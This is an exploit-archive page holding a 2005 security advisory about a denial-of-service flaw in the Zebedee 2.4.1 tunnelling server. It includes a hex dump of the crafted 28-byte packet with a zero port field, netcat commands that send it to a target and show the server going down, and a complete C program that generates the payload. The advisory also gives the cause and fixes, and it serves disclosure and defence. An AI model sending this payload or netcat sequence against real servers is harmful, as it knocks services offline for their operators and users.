mkZebedeeDoS.c

mkZebedeeDoS.c: Posted Sep 13, 2005; Authored by Mitsuaki Shiraishi, Tomoki Sanaki, Mutallip Ablimit; Zebedee 2.4.1 is susceptible to a denial of service attack when receiving a zero as a port number in the protocol option header. Sample exploit is provided.; tags | exploit, denial of service, protocol; SHA-256 | c26645d10af7a1f0b504e7f6f462706a519ea7833137057dfbb4d96aa04e9c30; Download | Favorite | View

mkZebedeeDoS.c

We have found a denial of service vulnerability in Zebedee.
This issue have been fixed in 2.4.1A.

[TESTED ON]

Zebedee 2.4.1 (Windows version and source compiled Linux version)

[VULNERABILITY]

The server crushes when "0" received as the port number in the
protocol option header.

$ od -tx1z -Ax zebedeeDoS
000000 02 01 00 00 20 00 00 06 00 00 00 80 ff ff ff ff  >.... ...........<
000010 0b d8 30 b3 21 9c a6 74 00 00 00 00              >..0.!..t....<
00001c

The 9th and 10th byte of the header contains 0x00.

$ nc -vv -z -w2 zebedeehost 11965
zebedeehost [192.168.xxx.xxx] 11965 (?) open
 sent 0, rcvd 0

$ nc -vv zebedeehost 11965 < zebedeeDoS
zebedeehost [192.168.xxx.xxx] 11965 (?) open
 sent 28, rcvd 2

$ nc -vv -z -w2 zebedeehost 11965
zebedeehost [192.168.xxx.xxx] 11965 (?) : Connection refused
 sent 0, rcvd 0

$

In the zebedee.c, please look at the function makeConnection() wich called 
from server(),

   1703     /* Sanity check */
   1704
   1705     assert(host != NULL && port != 0);
   1706

Here, if the port number is "0", both sub and parent processes seemed to 
quit running.

This issue occurs when the "allowed redirection port" not set(in default).

[SOLUTION]

1) Upgrading zebedee to 2.4.1A.
Or
2) Setting up allowed redirection ports will address this issue.

[SAMPLE EXPLOIT]

mkZebedeeDoS.c

/*
  $ gcc -o mkZebedeeDoS mkZebedeeDoS.c
  $ ./mkZebedeeDoS > zebedeeDoS
  $ nc targethost port < zebedeeDoS
*/

#include <stdio.h>

int main (int argc, char **argv)
{

  int i, size;

  char data[] = {
  0x02, 0x01, // protocol version
  0x00, 0x00, // flags
  0x20, 0x00, // max message size
  0x00, 0x06, // compression info
  0x00, 0x00, // port request: value = 0x0
  0x00, 0x80, // key length
  0xff, 0xff, 0xff, 0xff, // key token
  0x0b, 0xd8, 0x30, 0xb3, 0x21, 0x9c, 0xa6, 0x74, // nonce value
  0x00, 0x00, 0x00, 0x00 // target host address
   };

  size = 28;
  for(i=0; i<size; i++){
    printf("%c", data[i]);
  }

  return 0;

}


[DISCOVERED BY]

International Network Security, Inc.
  Mitsuaki Shiraishi
  Tomoki Sanaki
  Mutallip Ablimit


-----------------
International Network Security, Inc.
Shiraishi.M
<shiraishi@insi.co.jp>

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

mkZebedeeDoS.c

mkZebedeeDoS.c

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

mkZebedeeDoS.c

Share This

mkZebedeeDoS.c

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems